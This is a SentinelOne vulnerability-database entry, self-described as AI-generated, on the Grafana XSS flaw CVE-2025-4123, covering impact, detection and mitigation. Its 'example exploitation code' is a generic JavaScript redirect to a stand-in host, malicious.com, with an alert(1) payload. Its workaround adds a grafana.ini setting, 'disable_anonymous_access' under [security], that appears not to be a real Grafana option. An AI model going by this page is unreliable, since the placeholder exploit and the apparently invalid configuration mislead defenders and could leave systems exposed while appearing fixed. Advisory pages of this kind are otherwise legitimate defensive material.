SentinelOne
CVE Vulnerability Database
Vulnerability Database/CVE-2025-4123

CVE-2025-4123: Grafana XSS Vulnerability via Redirect

CVE-2025-4123 is a cross-site scripting vulnerability in Grafana that exploits path traversal and open redirect to execute arbitrary JavaScript. Attackers can leverage this without editor permissions to compromise users.

Updated:

CVE-2025-4123 Overview

A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and, if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.

Critical Impact

Attackers can leverage this vulnerability to execute arbitrary JavaScript, potentially leading to data exposure and unauthorized actions.

Affected Products

  • Grafana 10.4.18
  • Grafana 11.2.9
  • Grafana 11.3.6

Discovery Timeline

  • Not Available - Vulnerability discovered by Not Available
  • Not Available - Responsible disclosure to Grafana
  • Not Available - CVE CVE-2025-4123 assigned
  • Not Available - Grafana releases security patch
  • 2025-05-22 - CVE CVE-2025-4123 published to NVD
  • 2025-08-15 - Last updated in NVD database

Technical Details for CVE-2025-4123

Vulnerability Analysis

This vulnerability is primarily driven by a combination of a path traversal and open redirect flaw in Grafana. When exploited, attackers can redirect users to malicious sites that execute arbitrary JavaScript code.

Root Cause

The root cause lies in improper handling of URLs that allows redirections to unintended domains combined with path traversal capabilities.

Attack Vector

This vulnerability can be exploited over a network with a specially crafted URL that entices users to visit a malicious site.

javascript
// Example exploitation code
const redirectUrl = 'https://malicious.com/plugin?js=alert(1)';
window.location.href = `/path/traversal${redirectUrl}`;

Detection Methods for CVE-2025-4123

Indicators of Compromise

  • Unusual redirect patterns in web server logs
  • Alerts triggered for anomalies in script execution
  • Unauthenticated requests to specific Grafana endpoints

Detection Strategies

Security teams should monitor web server logs for unusual redirection patterns, particularly those involving redirects to external domains.

Monitoring Recommendations

Implement monitoring of HTTP requests for anomalies, and use security tools that track and alert on client-side script execution from external sources.

How to Mitigate CVE-2025-4123

Immediate Actions Required

  • Disable anonymous access in Grafana
  • Update Grafana to the latest patched version
  • Restrict HTTP headers to trusted sources

Patch Information

Grafana has released patches to address this vulnerability. Details can be found in their security advisory.

Workarounds

Temporary workarounds include implementing a more restrictive Content-Security-Policy (CSP) to block unauthorized script execution.

bash
# Configuration example
cat <<EOT >> /etc/grafana/grafana.ini
[security]
disable_anonymous_access = true
EOT

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne